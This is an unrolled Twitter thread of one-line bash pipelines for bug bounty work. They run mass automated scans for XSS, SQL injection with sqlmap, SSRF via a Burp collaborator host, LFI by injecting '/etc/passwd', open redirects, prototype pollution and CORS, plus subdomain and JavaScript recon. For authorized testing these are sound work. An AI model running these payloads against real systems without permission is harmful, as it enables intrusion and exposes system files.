Hossein NafisiAsl Profile picture
Mar 16 β€’ 13 tweets β€’ 15 min read
#Secret2
Bug Bounty with One-Line Bash ScriptsπŸ’΅πŸ˜Ž

You can mention your favorite script. I will add them to this thread.
#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
1/ #Secret2

🎯 Hunt #XSS:
πŸ‘‰πŸ» cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
πŸ‘‰πŸ» cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
2/ #Secret2

🎯 Hunt #SQLi:
πŸ‘‰πŸ»httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
3/ #Secret2

🎯 Hunt #SSRF:
πŸ‘‰πŸ»findomain -t target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace YOUR.burpcollaborator.net

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
4/ #Secret2

🎯 Hunt #LFI:
πŸ‘‰πŸ» gau vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
5/ #Secret2

🎯 Hunt #OpenRedirect:
πŸ‘‰πŸ» gau vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
6/

🎯 Hunt #PrototypePollution
πŸ‘‰πŸ»subfinder -d target.com | httpx -silent | sed 's/$/\/?__proto__[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"

#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
7/

🎯 Hunt #CORS:
πŸ‘‰πŸ» gau vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: evvil.com" -X GET $url) | if grep 'https://t.co/HWPPlCCXOJ'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
8/ #Secret2

🎯 Extract .js:
πŸ‘‰πŸ» echo target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
9/ #Secret2

🎯 Extract URLs from comment:
πŸ‘‰πŸ» cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
10/ #Secret2

🎯 Dump In-scope Assets from HackerOne:
πŸ‘‰πŸ» curl -sL github.com/arkadiyt/bount… | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
11/ #Secret2

🎯 Find live host/domain/assets:
πŸ‘‰πŸ» subfinder -d vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»
12/ #Secret2

🎯 Screenshot:
πŸ‘‰πŸ» assetfinder -subs-only target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

#BugBounty #BugBountyTip
#100BugBountySecrets
πŸ§΅πŸ‘‡πŸ»

β€’ β€’ β€’

Missing some Tweet in this thread? You can try to force a refresh
γ€€

Keep Current with Hossein NafisiAsl

Hossein NafisiAsl Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @MeAsHacker_HNA

May 16
#Secret3
6 Questions that Guarantee your Bounty 😈

#bugbountytipsπŸ‘‡πŸ»πŸ§΅
1/
How does the app pass data?

parameter or path? Image
2/
How/Where does app Talk about users?

Cookie or API Calls?

uid or username or email or uuid? Image
Read 8 tweets
May 12
How We hacked Admin Panel just by JS file:
(step by step)
#bugbounty #bugbountytips

πŸ§΅πŸ‘‡πŸ»
1/ Introduction πŸ“–

Team gave mobile app and website.

We didn’t waste of time on mobile app and decided to work on website.

We just tried to find Admin Panel because main domain was just a single page to download the app.
2/ Subdomain Enumeration πŸ”Ž

After brute forcing the subdomains we found that website had a subdomain like that admin.target.com

When we visited the subdomain we just got that Login Portal
Read 8 tweets
May 11
Have you ever get bounty by using default credentials?
Read this thread πŸ”₯

#bugbountytips
πŸ§΅πŸ‘‡πŸ»
You need to have a special word list for each vendor.

This thread has most known vendors default credentials that gathered from several sources.

Default Credentials for Apache Tomcat:
2/
Default Credentials for Cisco
Read 8 tweets
Mar 9
1/

R3C0Nizer is the first ever CLI based menu-driven automated web application B-Tier recon framework ...
github.com/Anon-Artist/R3…

#Recon #BugBounty
#100BugBountySecrets
πŸ§΅πŸ‘‡
2/

scant3r is a module-based web security tool, our goal is to make customizable tool with providing many functions and features that what you need for write a security module....
github.com/knassar702/sca…

#Recon #BugBounty
#100BugBountySecrets
πŸ§΅πŸ‘‡
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(